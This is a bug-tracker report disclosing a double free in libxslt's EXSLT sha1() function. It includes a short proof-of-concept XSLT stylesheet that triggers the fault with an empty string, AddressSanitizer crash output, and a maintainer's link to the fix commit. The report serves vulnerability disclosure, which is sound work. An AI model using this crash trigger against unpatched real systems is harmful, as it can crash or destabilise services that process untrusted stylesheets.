GNOME Bugzilla – Bug 765271
Double free in sha1()
Last modified: 2016-04-20 12:39:33 UTC
Created attachment 326353 [details] PoC XSLT As shown under ASan, libxslt will attempt to free a pointer twice when the argument to sha1() is an empty string: - once in exsltCryptoPopString() line 479 - once in exsltCryptoSha1Function() line 570 These two calls to xmlFree() are very close, so this issue may not be exploitable. PoC: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:c="http://exslt.org/crypto"> <xsl:template match="/"> <xsl:value-of select="c:sha1('')"/> </xsl:template> </xsl:stylesheet> Repro: ==34428== ERROR: AddressSanitizer: attempting double-free on 0x60040000c350: #0 0x7f630a66d33a (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x1533a) #1 0x7f630a19f276 in exsltCryptoSha1Function /home/azureuser/libxslt/libexslt/crypto.c:570 #2 0x7f6309ec10a0 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x910a0) 0x60040000c350 is located 0 bytes inside of 1-byte region [0x60040000c350,0x60040000c351) freed by thread T0 here: #0 0x7f630a66d33a (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x1533a) #1 0x7f630a19e0c7 in exsltCryptoPopString /home/azureuser/libxslt/libexslt/crypto.c:479 #2 0x7f630a19f248 in exsltCryptoSha1Function /home/azureuser/libxslt/libexslt/crypto.c:567 #3 0x7f6309ec10a0 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x910a0) previously allocated by thread T0 here: #0 0x7f630a66d41a (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x1541a) #1 0x7f6309edcb88 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0xacb88) SUMMARY: AddressSanitizer: double-free ??:0 ?? ==34428== ABORTING
Fixed with the following commit: https://git.gnome.org/browse/libxslt/commit/?id=d8862309f08054218b28e2c8f5fb3cb2f650cac7 Thanks for the report.